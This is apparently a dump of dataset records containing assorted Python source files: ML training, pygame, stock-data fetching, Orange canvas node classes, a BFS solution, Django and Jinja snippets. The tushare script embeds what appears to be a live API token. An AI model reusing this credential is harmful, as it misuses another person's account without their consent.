register_callback(callback_func):\n print(\"append the callback ----------------------------\")\n global callbacklist\n callbacklist.append(callback_func)\n\nif __name__ == '__main__':\n \n print(\"Hello\")\n", "repo_name": "Hydrosys4/Master", "sub_path": "REGandDBmod.py", "file_name": "REGandDBmod.py", "file_ext": "py", "file_size_in_byte": 1163, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 65, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "statusdataDBmod.write_status_data", "line_number": 18, "usage_type": "call"}, {"api_name": "sensordbmod.insertdataintable", "line_number": 23, "usage_type": "call"}, {"api_name": "statusdataDBmod.write_status_data", "line_number": 27, "usage_type": "call"}, {"api_name": "actuatordbmod.insertdataintable", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "19840044759", "text": "import torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport os\nimport numpy as np\nimport time\nfrom src.training import prep_tile\nfrom classifierLoading import tile_dataloader\nfrom net import ResidualBlock, Net\nimport multiprocessing\nfrom torch import optim\nfrom time import time\n\nimport argparse\n\ncuda = torch.cuda.is_available()\nparser = argparse.ArgumentParser(description='PyTorch Example')\nparser.add_argument('--disable-cuda', action='store_true',\n help='Disable CUDA')\nargs = parser.parse_args()\nargs.device = None\nif not args.disable_cuda and torch.cuda.is_available():\n args.device = torch.device('cuda')\nelse:\n args.device = torch.device('cpu')\n\ndevice = args.device\nprint(device)\n\nprint(\"Using {} cpu cores\".format(multiprocessing.cpu_count()))\ntorch.set_num_threads(multiprocessing.cpu_count())\n\n\n# Setting up the model\nz_dim = 64\nnum_blocks = [2, 2, 2, 2, 2]\nin_channels = 4\nmodel = Net(in_channels=in_channels, num_blocks=num_blocks, z_dim=z_dim)\nmodel_dict = model.state_dict()\ncheckpoint = torch.load(os.path.join(\n \"models\", \"all_of_sent\"))\n#checkpoint = {k: v for k, v in checkpoint.items() if k in model_dict}\nmodel_dict.update(checkpoint)\nmodel.load_state_dict(model_dict)\nfor param in model.parameters():\n param.requires_grad = False\nfor idx, child in enumerate(model.children()):\n if idx < 2 and idx > 6:\n for param in child.parameters():\n param.requires_grad = True\nmodel = model.to(device=device)\nmodel = model.train()\nprint(\"Model successfully loaded\")\n\n\nimg_list = []\nfor root, dirs, files in os.walk('../../../data/corn_belt'):\n img_list = files\n break\nbatch_size=100\ndataloader = tile_dataloader(img_list, batch_size)\n\nlr = 1e-3\noptimizer = optim.Adam(model.parameters(), lr=lr, betas=(.9,.999))\n\nepochs=2\nsave_models=True\nmodel_dir = 'classifier_models'\n\nif not os.path.exists(model_dir):\n os.makedirs(model_dir)\n \nt0 = time()\nprint('Begin Classifier Training......')\nfor epoch in range(0, epochs):\n running_loss = 0.0\n for idx, data in enumerate(dataloader):\n tile, label = data\n tile, label = prep_tile(tile, label, device=device)\n optimizer.zero_grad()\n print(tile)\n outputs = model(tile.float().cuda())\n loss = model.loss()\n loss = loss(outputs, label.long())\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n print(\"Batch Loaded\")\n if idx % 10 == 9: # print every 2000 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, idx + 1, running_loss / 5))\n running_loss = 0.0\n \n\n", "repo_name": "tommymcarver/Tile2Vec-Sentinel2-Classifier", "sub_path": "mlpClassifier.py", "file_name": "mlpClassifier.py", "file_ext": "py", "file_size_in_byte": 2679, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.cuda.is_available", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 17, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 26, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.set_num_threads", "line_number": 32, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 32, "usage_type": "call"}, {"api_name": "net.Net", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 58, "usage_type": "call"}, {"api_name": "classifierLoading.tile_dataloader", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 65, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 72, "usage_type": "call"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "src.training.prep_tile", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "13921972302", "text": "from typing import List\nimport random\n#feladat1\n#print(max(int(input()), (int(input())), (int(input()))))\n#feladat2\ndef listazas(lista: list) -> list:\n lista2: List['int'] = list()\n atlag = sum(lista) // len(lista)\n for i in range(len(lista)):\n if lista[i] < atlag:\n lista2.append(lista[i])\n return lista2\nprint(listazas([1123452342, 546876976452, 43564745363, 345635354, 35635636, 35633656, 36535637, 7969678]))\n\n#feladat3\ndef kilencven():\n lista1: List['int'] = list()\n for i in range(1 ,91):\n lista1.append((i))\n for x in range(200):\n random1: int = random.randint(0, len(lista1) - 1)\n random2: int = random.randint(0, len(lista1) - 1)\n lista1[random2] = int(lista1[random1])\n lista1[random1] = int(lista1[random2])\n", "repo_name": "csany2020c/MyGame", "sub_path": "Hazi/KornelHazi.py", "file_name": "KornelHazi.py", "file_ext": "py", "file_size_in_byte": 793, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "40473466579", "text": "import pygame\nfrom projectile import Projectile\n\nclass Boss(pygame.sprite.Sprite):\n\n def __init__(self, game):\n super().__init__()\n self.game = game\n self.health = 400\n self.max_health = 400\n self.attack = 10\n self.velocity = 5\n self.count = 1\n\n self.tt_projectiles1 = pygame.sprite.Group()\n self.tt_projectiles2 = pygame.sprite.Group()\n self.nb_projectiles = 20\n \n\n self.image = pygame.image.load(\"images/Boss1.png\").convert_alpha()\n self.image = pygame.transform.smoothscale(self.image, (256,256))\n self.rect = self.image.get_rect()\n \n self.rect.x = 450\n self.rect.y = 400\n self.yg = (self.rect.y)-100\n self.yd = self.rect.y + 100\n\n def draw(self, surface):\n surface.blit(self.image, self.rect)\n\n\n def damage(self, amount):\n #infliger les degats\n self.health -= amount\n\n #verifier si ses pv <= 0\n if self.health <= 0: \n self.game.add_score(100)\n \n #Supprimer le monstre\n self.game.tt_boss.remove(self) #fais gaffe ça supprime tous les monstres \n #ajout du score\n \n def update_health_bar(self, surface):\n \n bar_color = (111, 210, 46)\n\n back_bar_color = (60,63,60)\n \n\n bar_position = [self.rect.x - 15, self.rect.y, self.health ,5]\n \n back_bar_position = [self.rect.x - 15, self.rect.y, self.max_health ,5]\n\n pygame.draw.rect(surface, back_bar_color, back_bar_position)\n pygame.draw.rect(surface,bar_color, bar_position)\n \n \n def deplaM(self):\n if self.rect.y == self.yd:\n self.count *= -1\n if self.rect.y == self.yg:\n self.count *= -1\n\n if self.count > 0 :\n if self.rect.y < self.yd:\n if not self.game.check_collisionMonstre(self,self.game.tt_players):\n self.rect.y += self.velocity\n #si le monstre est en collision avec le joueur il inflige des degats\n else: \n self.game.player.damage(self.attack)\n if self.count < 0 :\n if self.rect.y > self.yg:\n if not self.game.check_collisionMonstre(self,self.game.tt_players):\n self.rect.y -= self.velocity\n else: \n self.game.player.damage(self.attack)\n\n\n def lancer_projectile1(self):\n self.tt_projectiles1.add(Projectile(self, \"boss\"))\n \n def lancer_projectile2(self):\n self.tt_projectiles2.add(Projectile(self, \"boss\"))\n", "repo_name": "Americanos33/GameJam2021", "sub_path": "boss.py", "file_name": "boss.py", "file_ext": "py", "file_size_in_byte": 2641, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pygame.sprite", "line_number": 4, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 57, "usage_type": "attribute"}, {"api_name": "projectile.Projectile", "line_number": 82, "usage_type": "call"}, {"api_name": "projectile.Projectile", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "19663392453", "text": "#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n\nimport psycopg2 #使用的是PostgreSQL数据库\nimport tushare as ts\nfrom Stocks import *\nfrom HData_holder import *\nimport time,datetime\n\nfrom time import clock\n\nfrom file_interface import *\n\nimport pandas as pd\n\nimport sys\nimport os\n \ntoken='21dddafc47513ea46b89057b2c4edf7b44882b3e92274b431f199552'\npro = ts.pro_api(token)\n\n\ndebug=0\n#debug=1\n\n\ndef update_holder(nowdate):\n codestock_local=stocks.get_codestock_local()\n if debug:\n print(codestock_local)\n\n length=len(codestock_local)\n\n\n for i in range(0,length):\n nowcode=codestock_local[i][0]\n\n maxdate=hdata_holder.db_get_maxdate_of_stock(nowcode)\n if debug:\n print('maxdate:%s, nowdate:%s' % (maxdate, nowdate))\n \n #get start date\n if(maxdate):\n start_date=(maxdate + datetime.timedelta(1)).strftime(\"%Y%m%d\")\n else:#说明从未获取过这只股票的历史数据\n start_date='20180101'\n\n #get end date\n end_date=nowdate.strftime(\"%Y%m%d\")\n\n #get stock_code\n if nowcode[0:1] == '6':\n stock_code_new= nowcode + '.SH'\n else:\n stock_code_new= nowcode + '.SZ'\n\n if debug:\n print('stock_code_new:%s, start_date:%s, end_date:%s' % (stock_code_new, start_date, end_date))\n\n #get data\n hist_data = pro.stk_holdernumber(ts_code=stock_code_new, start_date=start_date, end_date=end_date)\n \n time.sleep(0.6) #fix bug: 抱歉,您每分钟最多访问该接口100次\n\n if hist_data is None:\n if debug:\n print(\"hist_data is None: %d, %s, %s\" % (i,nowcode,codestock_local[i][1]))\n continue\n\n if(len(hist_data) == 0):\n if debug:\n print(\"hist_data length is 0: i=%d, nowcode:%s, nowname:%s \" %(i,nowcode,codestock_local[i][1]))\n continue\n\n hist_data=hist_data.fillna(0)\n\n hist_data=hist_data.drop_duplicates(subset='end_date', keep='first', inplace=False) #delete end_date line with the same data\n\n #handle hist_data\n new_data = pd.DataFrame()\n new_data['record_date'] = hist_data['end_date']\n new_data['stock_code'] = nowcode\n new_data['ann_date'] = hist_data['ann_date']\n new_data['end_date'] = hist_data['end_date'] \n new_data['holder_num'] = hist_data['holder_num'] \n\n new_data['record_date']=new_data['record_date'].apply(lambda x: datetime.datetime.strptime(x,'%Y%m%d'))\n \n hist_data = new_data.set_index('record_date')\n\n if debug:\n print(hist_data.head(10))\n\n hdata_holder.insert_allstock_hdatadate(hist_data)\n\n if debug:\n print(\"2\", maxdate, nowdate, hist_data)\n\nif __name__ == '__main__':\n \n t1 = clock()\n \n nowdate=datetime.datetime.now().date()\n\n stocks=Stocks(\"usr\",\"usr\")\n hdata_holder=HData_holder(\"usr\",\"usr\")\n\n #hdata_holder.db_hdata_date_create()\n\n hdata_holder.db_connect()#由于每次连接数据库都要耗时0.0几秒,故获取历史数据时统一连接\n\n update_holder(nowdate)\n\n t2 = clock()\n\n print(\"t1:%s, t2:%s, delta=%s\"%(t1, t2, t2-t1))\n hdata_holder.db_disconnect()\n", "repo_name": "chntylz/a_stock", "sub_path": "main_holder.py", "file_name": "main_holder.py", "file_ext": "py", "file_size_in_byte": 3273, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "tushare.pro_api", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 44, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 80, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 87, "usage_type": "attribute"}, {"api_name": "time.clock", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 103, "usage_type": "attribute"}, {"api_name": "time.clock", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "2119957766", "text": "\"\"\"\n===========\nScheme Node\n===========\n\n\"\"\"\nimport enum\nimport warnings\nfrom typing import Optional, Dict, Any, List, Tuple, Iterable, Union\n\nfrom AnyQt.QtCore import QObject, QCoreApplication\nfrom AnyQt.QtCore import pyqtSignal as Signal, pyqtProperty as Property\n\nfrom ..registry import WidgetDescription, InputSignal, OutputSignal\nfrom .events import NodeEvent\n\n\nclass UserMessage(object):\n \"\"\"\n A user message that should be displayed in a scheme view.\n\n Parameters\n ----------\n contents : str\n Message text.\n severity : int\n Message severity.\n message_id : str\n Message id.\n data : dict\n A dictionary with optional extra data.\n \"\"\"\n #: Severity flags\n Info, Warning, Error = 1, 2, 3\n\n def __init__(self, contents, severity=Info, message_id=\"\", data={}):\n # type: (str, int, str, Dict[str, Any]) -> None\n self.contents = contents\n self.severity = severity\n self.message_id = message_id\n self.data = dict(data)\n\n\nclass SchemeNode(QObject):\n \"\"\"\n A node in a :class:`.Scheme`.\n\n Parameters\n ----------\n description : :class:`WidgetDescription`\n Node description instance.\n title : str, optional\n Node title string (if None `description.name` is used).\n position : tuple\n (x, y) tuple of floats for node position in a visual display.\n properties : dict\n Additional extra instance properties (settings, widget geometry, ...)\n parent : :class:`QObject`\n Parent object.\n\n \"\"\"\n class State(enum.IntEnum):\n \"\"\"\n A workflow node's runtime state flags\n \"\"\"\n #: The node has no state.\n NoState = 0\n\n #: The node is running (i.e. executing a task).\n Running = 1\n\n #: The node has invalidated inputs. This flag is set when:\n #:\n #: * An input link is added or removed\n #: * An input link is marked as pending\n #:\n #: It is set/cleared by the execution manager when the inputs are\n #: propagated to the node.\n Pending = 2\n\n #: The node has invalidated outputs. Execution manager should not\n #: propagate this node's existing outputs to dependent nodes until\n #: this flag is cleared.\n Invalidated = 4\n\n #: The node is in a state where it does not accept new signals.\n #: The execution manager should not propagate inputs to this node\n #: until this flag is cleared.\n NotReady = 8\n\n NoState = State.NoState\n Running = State.Running\n Pending = State.Pending\n Invalidated = State.Invalidated\n NotReady = State.NotReady\n\n def __init__(self, description, title=None, position=None,\n properties=None, parent=None):\n # type: (WidgetDescription, str, Tuple[float, float], dict, QObject) -> None\n super().__init__(parent)\n self.description = description\n\n if title is None:\n title = description.name\n\n self.__title = title\n self.__position = position or (0, 0)\n self.__progress = -1\n self.__processing_state = 0\n self.__tool_tip = \"\"\n self.__status_message = \"\"\n self.__state_messages = {} # type: Dict[str, UserMessage]\n self.__state = SchemeNode.NoState # type: Union[SchemeNode.State, int]\n self.properties = properties or {}\n\n def input_channels(self):\n # type: () -> List[InputSignal]\n \"\"\"\n Return a list of input channels (:class:`InputSignal`) for the node.\n \"\"\"\n return list(self.description.inputs)\n\n def output_channels(self):\n # type: () -> List[OutputSignal]\n \"\"\"\n Return a list of output channels (:class:`OutputSignal`) for the node.\n \"\"\"\n return list(self.description.outputs)\n\n def input_channel(self, name):\n # type: (str) -> InputSignal\n \"\"\"\n Return the input channel matching `name`. Raise a `ValueError`\n if not found.\n \"\"\"\n for channel in self.input_channels():\n if channel.id == name:\n return channel\n # Fallback to channel names for backward compatibility\n for channel in self.input_channels():\n if channel.name == name:\n return channel\n raise ValueError(\"%r is not a valid input channel for %r.\" % \\\n (name, self.description.name))\n\n def output_channel(self, name):\n # type: (str) -> OutputSignal\n \"\"\"\n Return the output channel matching `name`. Raise an `ValueError`\n if not found.\n \"\"\"\n for channel in self.output_channels():\n if channel.id == name:\n return channel\n # Fallback to channel names for backward compatibility\n for channel in self.output_channels():\n if channel.name == name:\n return channel\n raise ValueError(\"%r is not a valid output channel for %r.\" % \\\n (name, self.description.name))\n\n #: The title of the node has changed\n title_changed = Signal(str)\n\n def set_title(self, title):\n \"\"\"\n Set the node title.\n \"\"\"\n if self.__title != title:\n self.__title = title\n self.title_changed.emit(self.__title)\n\n def _title(self):\n \"\"\"\n The node title.\n \"\"\"\n return self.__title\n\n title: str\n title = Property(str, _title, set_title) # type: ignore\n\n #: Position of the node in the scheme has changed\n position_changed = Signal(tuple)\n\n def set_position(self, pos):\n \"\"\"\n Set the position (``(x, y)`` tuple) of the node.\n \"\"\"\n if self.__position != pos:\n self.__position = pos\n self.position_changed.emit(pos)\n\n def _get_position(self):\n \"\"\"\n ``(x, y)`` tuple containing the position of the node in the scheme.\n \"\"\"\n return self.__position\n\n position: Tuple[float, float]\n position = Property(tuple, _get_position, set_position) # type: ignore\n\n #: Node's progress value has changed.\n progress_changed = Signal(float)\n\n def set_progress(self, value):\n \"\"\"\n Set the progress value.\n \"\"\"\n if self.__progress != value:\n self.__progress = value\n self.progress_changed.emit(value)\n\n def _progress(self):\n \"\"\"\n The current progress value. -1 if progress is not set.\n \"\"\"\n return self.__progress\n\n progress: float\n progress = Property(float, _progress, set_progress) # type: ignore\n\n #: Node's processing state has changed.\n processing_state_changed = Signal(int)\n\n def set_processing_state(self, state):\n \"\"\"\n Set the node processing state.\n \"\"\"\n self.set_state_flags(SchemeNode.Running, bool(state))\n\n def _processing_state(self):\n \"\"\"\n The node processing state, 0 for not processing, 1 the node is busy.\n \"\"\"\n return int(bool(self.state() & SchemeNode.Running))\n\n processing_state: int\n processing_state = Property( # type: ignore\n int, _processing_state, set_processing_state)\n\n def set_tool_tip(self, tool_tip):\n if self.__tool_tip != tool_tip:\n self.__tool_tip = tool_tip\n\n def _tool_tip(self):\n return self.__tool_tip\n\n tool_tip: str\n tool_tip = Property(str, _tool_tip, set_tool_tip) # type: ignore\n\n #: The node's status tip has changes\n status_message_changed = Signal(str)\n\n def set_status_message(self, text):\n # type: (str) -> None\n \"\"\"Set a short status message.\"\"\"\n if self.__status_message != text:\n self.__status_message = text\n self.status_message_changed.emit(text)\n\n def status_message(self):\n # type: () -> str\n \"\"\"A short status message summarizing the current node state.\"\"\"\n return self.__status_message\n\n #: The node's state message has changed\n state_message_changed = Signal(UserMessage)\n\n def set_state_message(self, message):\n # type: (UserMessage) -> None\n \"\"\"\n Set a message to be displayed by a scheme view for this node.\n \"\"\"\n if message.message_id is not None:\n self.__state_messages[message.message_id] = message\n self.state_message_changed.emit(message)\n else:\n warnings.warn(\n \"'message' with no id was ignored. \"\n \"This will raise an error in the future.\",\n FutureWarning, stacklevel=2\n )\n\n def clear_state_message(self, message_id):\n # type: (str) -> None\n \"\"\"\n Clear (remove) a message with `message_id`.\n\n :attr:`state_message_changed` signal will be emitted with a empty\n message for the `message_id`.\n \"\"\"\n if message_id in self.__state_messages:\n # emit an empty message\n m = self.__state_messages[message_id]\n m = UserMessage(\"\", m.severity, m.message_id)\n self.__state_messages[message_id] = m\n self.state_message_changed.emit(m)\n del self.__state_messages[message_id]\n\n def state_message(self, message_id):\n # type: (str) -> Optional[UserMessage]\n \"\"\"\n Return a message with `message_id` or None if a message with that\n id does not exist.\n \"\"\"\n return self.__state_messages.get(message_id, None)\n\n def state_messages(self):\n # type: () -> Iterable[UserMessage]\n \"\"\"\n Return a list of all state messages.\n \"\"\"\n return self.__state_messages.values()\n\n state_changed = Signal(int)\n\n def set_state(self, state):\n # type: (Union[State, int]) -> None\n \"\"\"\n Set the node runtime state flags\n\n Parameters\n ----------\n state: SchemeNode.State\n \"\"\"\n if self.__state != state:\n curr = self.__state\n self.__state = state\n QCoreApplication.sendEvent(\n self, NodeEvent(NodeEvent.NodeStateChange, self)\n )\n self.state_changed.emit(state)\n if curr & SchemeNode.Running != state & SchemeNode.Running:\n self.processing_state_changed.emit(\n int(bool(state & SchemeNode.Running))\n )\n\n def state(self):\n # type: () -> Union[State, int]\n \"\"\"\n Return the node runtime state flags.\n \"\"\"\n return self.__state\n\n def set_state_flags(self, flags, on):\n # type: (Union[State, int], bool) -> None\n \"\"\"\n Set the specified state flags on/off.\n\n Parameters\n ----------\n flags: SchemeNode.State\n Flag to modify\n on: bool\n Turn the flag on or off\n \"\"\"\n if on:\n state = self.__state | flags\n else:\n state = self.__state & ~flags\n self.set_state(state)\n\n def test_state_flags(self, flag):\n # type: (State) -> bool\n \"\"\"\n Return True/False if the runtime state flag is set.\n\n Parameters\n ----------\n flag: SchemeNode.State\n\n Returns\n -------\n val: bool\n \"\"\"\n return bool(self.__state & flag)\n\n def __str__(self):\n return \"SchemeNode(description_id=%r, title=%r, ...)\" % \\\n (str(self.description.id), self.title)\n\n def __repr__(self):\n return str(self)\n\n def __getstate__(self):\n return self.description, \\\n self.__title, \\\n self.__position, \\\n self.properties, \\\n self.parent()\n\n def __setstate__(self, state):\n self.__init__(*state)\n", "repo_name": "biolab/orange-canvas-core", "sub_path": "orangecanvas/scheme/node.py", "file_name": "node.py", "file_ext": "py", "file_size_in_byte": 11750, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "41", "api": [{"api_name": "AnyQt.QtCore.QObject", "line_number": 44, "usage_type": "name"}, {"api_name": "enum.IntEnum", "line_number": 62, "usage_type": "attribute"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 163, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtProperty", "line_number": 180, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 183, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 199, "usage_type": "name"}, {"api_name": "AnyQt.QtCore.pyqtProperty", "line_number": 200, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 203, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtProperty", "line_number": 220, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 223, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtProperty", "line_number": 238, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtProperty", "line_number": 249, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 252, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 267, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 278, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.pyqtSignal", "line_number": 315, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.QCoreApplication.sendEvent", "line_number": 329, "usage_type": "call"}, {"api_name": "AnyQt.QtCore.QCoreApplication", "line_number": 329, "usage_type": "name"}, {"api_name": "events.NodeEvent", "line_number": 330, "usage_type": "call"}, {"api_name": "events.NodeEvent.NodeStateChange", "line_number": 330, "usage_type": "attribute"}]} +{"seq_id": "37947510753", "text": "## 힙큐 사용\n# import heapq\n\n# def bfs(n):\n# queue = []\n# max_num = 100001\n# visited = [-1] * max_num\n# visited[n] = 0\n# dx = [-1, 1]\n# heapq.heappush(queue, [visited[n], n])\n\n# while queue:\n# cnt, x = heapq.heappop(queue)\n# if x == k:\n# return cnt\n# nx = x * 2\n# if nx < max_num and visited[nx] == -1:\n# if visited[nx] == -1:\n# if nx == k:\n# return cnt\n# visited[nx] = cnt\n# heapq.heappush(queue, [cnt, nx])\n\n# for i in range(2):\n# nx = x + dx[i]\n# if 0 <= nx < max_num and visited[nx] == -1:\n# if nx == k:\n# return cnt + 1\n# visited[nx] = cnt + 1\n# heapq.heappush(queue, [cnt + 1, nx])\n\n\n# n, k = map(int, input().split())\n# print(bfs(n))\n\n\n## 디큐 사용\nfrom collections import deque\n\n\ndef bfs(n):\n dq = deque([n])\n visited[n] = 0\n\n while dq:\n dx = [-1, 1]\n x = dq.popleft()\n nx = x * 2\n if nx < max_num and visited[nx] == -1:\n visited[nx] = visited[x]\n dq.appendleft(nx)\n if nx == k:\n return visited[x]\n\n for i in range(2):\n nx = x + dx[i]\n if 0 <= nx < max_num and visited[nx] == -1:\n visited[nx] = visited[x] + 1\n dq.append(nx)\n if nx == k:\n return visited[x] + 1\n\n\nn, k = map(int, input().split())\n\nmax_num = 100001\nvisited = [-1] * max_num\n\nbfs(n)\nprint(visited[k])\n", "repo_name": "algoitssm/algorithm_sangjoon", "sub_path": "Baekjoon/13549.py", "file_name": "13549.py", "file_ext": "py", "file_size_in_byte": 1611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "collections.deque", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "15514955160", "text": "import numpy as np\nfrom shapely.geometry import Polygon, Point, LineString\n\ndef extract_polygons_and_centers(data):\n # Construye un conjunto de polígonos a partir de los datos de obstáculo\n polygons = []\n centers = []\n for i in range(data.shape[0]):\n north, east, alt, d_north, d_east, d_alt = data[i, :]\n obstacle = [north - d_north, north + d_north, east - d_east, east + d_east]\n corners = [(obstacle[0], obstacle[2]), (obstacle[0], obstacle[3]), (obstacle[1], obstacle[3]), (obstacle[1], obstacle[2])] \n height = alt + d_alt\n\n poly = Polygon(corners)\n polygons.append((poly, height))\n\n c = [north, east]\n centers.append(c)\n return polygons, np.asarray(centers)\n\ndef get_samples(data):\n xmin = np.min(data[:, 0] - data[:, 3])\n xmax = np.max(data[:, 0] + data[:, 3])\n\n ymin = np.min(data[:, 1] - data[:, 4])\n ymax = np.max(data[:, 1] + data[:, 4])\n\n zmin = 0\n # Limit the z axis for the visualization\n zmax = 10\n\n print(\"X\")\n print(\"min = {0}, max = {1}\\n\".format(xmin, xmax))\n\n print(\"Y\")\n print(\"min = {0}, max = {1}\\n\".format(ymin, ymax))\n\n print(\"Z\")\n print(\"min = {0}, max = {1}\".format(zmin, zmax))\n\n num_samples = 1000\n\n xvals = np.random.uniform(xmin, xmax, num_samples)\n yvals = np.random.uniform(ymin, ymax, num_samples)\n zvals = np.random.uniform(zmin, zmax, num_samples)\n\n samples = list(zip(xvals, yvals, zvals))\n return samples\n", "repo_name": "irvingvasquez/ra_programas", "sub_path": "planif_basada_en_muestreo/muestreo.py", "file_name": "muestreo.py", "file_ext": "py", "file_size_in_byte": 1480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "shapely.geometry.Polygon", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 45, "usage_type": "attribute"}]} +{"seq_id": "20502608077", "text": "from django.forms import ModelForm\nfrom .models import BlogPosts\n\nclass PostCreationForm(ModelForm):\n class Meta:\n model = BlogPosts\n fields = ['title','text','photo','photoAlt','published']\n labels = {\n \"title\":\"Post title:\",\n \"text\":\"Full text:\",\n \"photo\":\"Photo to post:\",\n \"photoAlt\":\"Alt to photo:\",\n \"published\":\"Should the post be public:\"\n }", "repo_name": "LukaszKwiatkowski94/Swimming-Pool-Django-Concept", "sub_path": "apps/blog/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.forms.ModelForm", "line_number": 4, "usage_type": "name"}, {"api_name": "models.BlogPosts", "line_number": 6, "usage_type": "name"}]} +{"seq_id": "20472859189", "text": "import gettext\nfrom jinja2 import (\n Environment,\n FileSystemLoader,\n)\n\ntry:\n from yaml import CLoader as Loader, CDumper as Dumper\nexcept ImportError:\n from yaml import Loader, Dumper\n\nclass Renderer:\n def __init__(self, content_dir='../../content/', output_dir='../../static/html'):\n loader = FileSystemLoader(searchpath='templates')\n self.defaults = {'translations': {}, 'sections': {'en': [], 'fr': []}}\n self.env = Environment(loader=loader, extensions=['jinja2.ext.i18n'])\n self.translations = {\n 'en': 